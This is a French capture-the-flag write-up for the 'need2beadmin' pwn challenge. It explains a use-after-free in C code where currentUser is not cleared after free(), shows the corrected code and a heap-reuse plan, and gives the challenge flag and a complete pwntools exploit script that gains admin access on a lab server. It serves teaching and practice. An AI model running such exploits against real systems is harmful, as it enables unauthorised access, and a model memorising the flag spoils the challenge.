# Write up Pown/need2beadmin

## Consigne : 

```
Vous êtes Chad Kaplan, et un lanceur d'alerte du nom de Spencer Parks vous envoit ce message :
Bonjour Chad,
D'après mes investigations, la société Umbrella Corporation serait sur le point de créer le virus T, le plus dangereux au monde !
Aidez-moi à pénétrer leurs systèmes informatiques pour les faire tomber, avoir des preuves matériels. 
Pour information ce service semble être faible: <adresse ip>:8955.
La vie de l'humanité en dépend.
Spencer Parks
```

## Pièce jointe :

```
Le source c: need2beadmin.c 
```

## Serveur :

```
Docker
```

## Points attribués :

```
60
```

## Hint : 

```

```

## Flag :

```
fl@g{NeMeDebranchezPas!OuVousMourrerezTous}

```

## Soluce :

Après avoir essayé de se connecter en tant qu'admin, en créant différents comptes (avec des espaces, des CR, etc...), il n'est pas possible d'accéder au compte 'Reine rouge'. On va donc analyser le code source.
On constate que le développeur ne réinitialise pas le pointeur de *currentUser* après avoir supprimé un utilisateur.

```c
void delUser() {
char name[memberSize(struct User, name)];
memcpy(name, currentUser->name, sizeof(name));
if (numberOfUsers <= MIN_USERS) {
printf("Besoin d'un minimum de %i utilisateurs.\n", MIN_USERS);
fflush(stdout);
exit(-5);
}
free(currentUser);
users[numberOfUsers-1] = NULL;c
printf("Utilisateur '%s' supprimé\n\n", name);
fflush(stdout);
numberOfUsers--;
}
```

En effet, il faudrait qu'il y ait un changement d'utilisateur dans le *currentUser* comme ci-dessous

```c
void delUser() {
char name[memberSize(struct User, name)];
memcpy(name, currentUser->name, sizeof(name));
if (numberOfUsers <= MIN_USERS) {
printf("Besoin d'un minimum de %i utilisateurs.\n", MIN_USERS);
fflush(stdout);
exit(-5);
}
free(currentUser);
currentUser = users[numberOfUsers-2]; //<= Mettre un autre utilisateur ou NULL.
users[numberOfUsers-1] = NULL;
printf("Utilisateur '%s' supprimé\n\n", name);
fflush(stdout);
numberOfUsers--;
}
```

Cette faute de programmation conduit à un **Use-After-Free**, une utilisation du pointeur **currentUser** après qu'il ait été libéré (free).

Nous voyons qu'il est possible de créer/supprimer des Rôles et Utilisateurs.

```
.======== Liste des commandes ========.
|   [1] Liste les utilisateurs
|   [2] Liste les rôles
|   [3] Créer un utilisateur
|   [4] Créer un rôle
|   [5] Supprimer un utilisateur
|   [6] Supprimer un rôle
|   [7] Passer en mode Rouge
|   [8] Info utilisateur
|   [9] Changer d'utilisateur
|   [0] Quitter
\____________________________________
--- Anonymous@default: 

```



S'il est possible de créer des utilisateurs et des rôles, regardons ce que sont ces utilisateurs et ces rôles.

```c
struct Role {
unsigned int id;
char name[8];
char alias[8];
};
struct User {
char name[16];
unsigned int role_id;
}
```

Regardons la taille de ces structures, pour *Role*, elle fait :
- unsigned int => 4 octets 
- char name[8] => 8 octets 
- char alias[8] => 8 octets

Pour *User*, elle fait :

- char name[16] => 16 octets ;

- unsigned int role_id => 4 octets.

  

Le but étant d'être dans le rôle 'Admin', il faudrait créer un utilisateur ayant un role_id qui vaut 1. Seulement, il n'est pas possible d'écraser role_id avec le name, car la copie est bien gérée.

```c
...
#define memberSize(type, member) sizeof(((type *)0)->member)
...
...
struct User *newUser(char *name, unsigned int roleId, unsigned short first) {
...
memcpy(user->name, name, sizeof(user->name));
...
}
...
```

Il faut donc envisager une autre méthode. Vu qu'il est possible de créer des utilisateurs, les supprimer tout en gardant un pointeur dessus, et que les structures *Role* et *User* font la même taille, il est possible d'abuser du pointeur currentUser de la façon suivante :

Représentation de la heap.
1. Création d'un User (18 Octets) avec comme nom "Hacker" et le rôle numéro 3.

  ```
                 +------------------------+
  currentUser => |      Utilisateur       | name (16 octets) => "Hacker", role_id (4 octets) => 3
                 +------------------------+
  
  ```

2. Suppression de l'User.

```
               +-------------------------+
currentUser => |                         | 
               +-------------------------+
```

3. Création d'un Role (4 octets) avec comme nom "test" et comme alias 1.

  

  ```
  Note: Remarquer qu'il n'y a pas de guillemets au 1, car nous n'allons pas écrire le caractère "1",
  mais bien le chiffre 1, soit 0x1.
  
                 +-------------------------+
  currentUser => |         Role            | id (4 octets) => X, name (8 octets) => "pwned",alias (8 octets) => 1
                 --------------------------+ 
  ```

Après avoir fait ça, comme *currentUser* pointe toujours à cet endroit, "le currentUser" a pour nom X+name+alias (les 6 premiers octets seulement), puis comme *role_id* 1.

Nous pouvons donc changer d'utilisateur (Reine rouge), pour passer ensuite en mode admin.

Voici un exemple d'exploit en python3 (page suivante).

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *

hote = "192.168.0.42"
port = 31002
r = remote(hote, port)

#r = process('./need2beadmin') 


res = r.recv()
print (res.decode('utf-8'))
# Création du payload


# creattion d'un Utilisateur
payload = b"3" 
r.sendline(payload)
res = r.recv()
print (res.decode('utf-8'))

# nom du user : hacker
payload = b"Hacker"
r.sendline(payload)
res = r.recv()
print (res.decode('utf-8'))

# affectation d'un rôle
payload = b"2" 
r.sendline(payload)
res = r.recv()
print (res.decode('utf-8'))

# Suppression de l'utilisateur
payload = b"5" 
r.sendline(payload)
res = r.recv()
print (res.decode('utf-8'))


#Création d'un Role
payload = b"4" 
r.sendline(payload)
res = r.recv()
print (res.decode('utf-8'))


# Nom du role
payload = b"pwned"
r.sendline(payload)
res = r.recv()
print (res.decode('utf-8'))


# send alias 
payload = b"\x00\x00\x00\x00\x01\x00\x00\x00"
r.sendline(payload)
res = r.recv()
print (res.decode('utf-8'))

sleep(0.5)

#input("CMD> ")


payload = b"9" # Changement d'utilisateur
r.sendline(payload)
res = r.recv()
print (res.decode('utf-8'))


payload = b"Reine rouge"
r.sendline(payload)
res = r.recv()
print (res.decode('utf-8'))


payload = b"7" # Passer en mode rouge
r.sendline(payload)
res = r.recvline()
print (res.decode('utf-8'))


r.readuntil(b"Message secret:\n|")
res = r.readline()
res = bytes.decode(res, encoding='utf-8')[:-1]


log.success("PWNED ! Le flag est: %s" % res)

r.close()

```

<!-- Ok F : 20220423 -->
